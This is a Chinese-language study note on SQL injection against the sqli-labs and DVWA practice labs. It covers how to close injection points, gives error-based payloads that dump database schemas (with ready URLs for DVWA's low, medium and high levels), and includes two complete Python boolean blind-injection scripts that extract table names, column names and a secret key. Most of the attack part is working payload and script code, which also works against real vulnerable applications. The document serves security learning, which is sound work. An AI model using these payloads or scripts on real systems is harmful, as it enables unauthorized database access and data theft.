注释符：'#','-- (杠杠空格)'
DDL：
CREAT DATABASE 库名 （创建库
DROP DATABASE 库名 （删除库
show databases （查询库
show tables （查询表
select database() (查看当前库名
desc 表名 （查看数据表结构
简单语句：

select 字段名 from 表名 where 条件（查询语句）

INSERT INTO 表名 (字段名1,字段名2,字段名3,...)
VALUES (字段值1,字段值2,字段值3,...);（查询语句）

UPDATE 表名 SET column1 = value1, column2 = value2, ... WHERE condition;（更新语句）

闭合

感觉闭合这个考点在这套题里面比较多见，这里做一个小小总结
select 语句，注入点的闭合，会用到以下几个符号

• 单引号 '
• 双引号 "
• 圆括号 )

而闭合的方式会有以下几种

• 无闭合

  $id = $id;
  $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
  Copy

• 单引号闭合

  $id = ''' . $id . ''';
  $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
  Copy

• 双引号闭合

  $id = ''' . $id . ''';
  $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
  Copy

• 括号闭合

  $id = $id;
  $sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
  Copy

• 混合闭合以上情况为，双引号+三对括号

  $id = '"' . $id . '"';
  $sql="SELECT * FROM users WHERE id=((($id))) LIMIT 0,1";
  Copy

面对这样的注入点

http://inhann.top:12345/Less-4/?id=
Copy

我们的第一步往往是闭合
像这样

http://inhann.top:12345/Less-4/?id=1'%23
Copy

http://inhann.top:12345/Less-4/?id=1"%23
Copy

http://inhann.top:12345/Less-4/?id=1"))%23
Copy

http://inhann.top:12345/Less-4/?id=1%23
Copy

在一定情况下，可以用下面pdf中所示的步骤完成闭合
不过还是得先明确以下所述闭合手段的局限性

• id几乎直接放到select语句中，最多被escape了
• 发生syntax error的时候可以辨认

简单的情况下，先两个引号都试试，看看报没报错，都报错就说明没用到引号
然后加注释，加了注释还报错了，说明用到了括号

报错注入

报错注入威力巨大
这里分享几个payload

超级payload

分享几个用得很爽的payload

(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)
Copy

及其一般形式

(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)
Copy

• dvwa low

  http://localhost/dvwa/vulnerabilities/sqli/?id='union select "a",(select (select (@p) from (select(@p:=0x00),(select (@p) from (information_schema.columns) where (table_schema>=@p) and (@p)in (@p:=concat(@p,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a))%23&Submit=Submit#
  Copy

image-20210130201015071

• dvwa medium

  id=1 union select 1,(select (select (@p) from (select(@p:=0x00),(select (@p) from (information_schema.columns) where (table_schema>=@p) and (@p)in (@p:=concat(@p,0x0D,0x0A,0x5b,table_schema,0x5d,0x3e,table_name,0x3e,column_name,0x7C))))a))%23&Submit=Submit
  Copy

image-20210130202412762

• dvwa high

  1'union select 1,(select (select (@p) from (select(@p:=0x00),(select (@p) from (information_schema.columns) where (table_schema>=@p) and (@p)in (@p:=concat(@p,0x0D,0x0A,0x5b,table_schema,0x5d,0x3e,table_name,0x3e,column_name,0x7C))))a))#
  Copy

image-20210130203457790

select 回显数据

最最基础的select回显数据，也分享一波

Column Num

获取columnNum的payload

盲注脚本

这里分享个布尔盲注的脚本

面向对象

# coding=utf-8
import requests

class BoolSqlier:
    url = ""
    def __init__(self,database=""):
        self.database = database
        self.url = BoolSqlier.url
    
    def get_database(self):

        def send_request(i,mid):

            payload = "1'and(ascii(substr(database(),{},1))>{})#".format(i,mid)
            params = {"id":payload}
            resp = requests.get(self.url,params=params)
            return resp
            
        def database_i_ascii_bt_mid(resp):
            if "You are in..........." in resp.text:
                return True
            else: 
                return False

        database=""
        for i in range(1,50):
            #head 和 tail 决定了database的字符的取值范围
            head=32         
            tail=127
            while head<tail:
                mid=(head+tail)>>1
                resp = send_request(i,mid)
               
                if database_i_ascii_bt_mid(resp):
                    head=mid+1
                else:
                    tail=mid
            if(head!=32):
                database+=chr(head)
                print(database)
        self.database = database
        print(database)
    


if __name__ == "__main__":
    BoolSqlier.url = "http://localhost:12345/Less-5/"
    sqli = BoolSqlier()
    sqli.get_database()
Copy

面向过程

import requests
session = requests.session()
url = "http://localhost/sqli-labs/Less-65/"
what_i_want = ""
table_name = ""
column_name = ""
key = ""
count = 0
text = ""
for i in range(1,30):
   def what_i_want_i_less_than_or_equal_mid(mid):
       global count
       count += 1
       print("on the {}th request now.... ".format(count))
       payload = "1\") and ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<={}#".format(i,mid)
       params = {"id":payload}
       resp = session.get(url=url,params=params)
       if "Angelina" in resp.text:
           return True
       return False
   
   print("--"*70,"table_name")
   print("processing the {}th char now.... ".format(i))
   low = 32
   high = 127
   while low < high:
       mid = (low + high)>>1
       if what_i_want_i_less_than_or_equal_mid(mid):
           high = mid
       else:
           low = mid + 1
       print("{}th request completed!!!".format(count))
   
   if low==32:
       break
   table_name+=chr(low)
   print(table_name)
   count = 0
print("!!"*70)
print("This is Your Loved table_name!!!!!!!!!!")
print(table_name)


for i in range(1,30):
   def what_i_want_i_less_than_or_equal_mid(mid):
       global count
       count += 1
       print("on the {}th request now.... ".format(count))
       payload = "1\") and ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='{}'),{},1))<={}#".format(table_name,i,mid)
       params = {"id":payload}
       resp = session.get(url=url,params=params)
       
       if "Angelina" in resp.text:
           return True
       return False
   
   print("--"*70,"column_name")
   print("processing the {}th char now.... ".format(i))
   low = 32
   high = 127
   while low < high:
       mid = (low + high)>>1
       if what_i_want_i_less_than_or_equal_mid(mid):
           high = mid
       else:
           low = mid + 1
       print("{}th request completed!!!".format(count))
   
   if low==32:
       break
   column_name+=chr(low)
   print(column_name)
   count = 0
import re
pattern = "secret_...."
column_name = re.findall(pattern,column_name)[0]
print("!!"*70)
print("This is Your Loved column_name!!!!!!!!!!")
print(column_name)

for i in range(1,30):
   def what_i_want_i_less_than_or_equal_mid(mid):
       global count
       count += 1
       print("on the {}th request now.... ".format(count))
       payload = "1\") and ascii(mid((select group_concat({}) from challenges.{}),{},1))<={}#".format(column_name,table_name,i,mid)
       print(payload)
       params = {"id":payload}
       resp = session.get(url=url,params=params)
       #print(resp.text)
       # if mid==79:
       #     print(resp.text)
       if "Angelina" in resp.text:
           return True
       return False
   
   print("--"*70,"key")
   print("processing the {}th char now.... ".format(i))
   low = 32
   high = 127
   while low < high:
       mid = (low + high)>>1
       if what_i_want_i_less_than_or_equal_mid(mid):
           high = mid
       else:
           low = mid + 1
       print("{}th request completed!!!".format(count))
   
   if low==32:
       break
   key+=chr(low)
   print(key)
   count = 0

print("!!"*70)
print("This is your loved key!!!!!!!!!!")
print(key)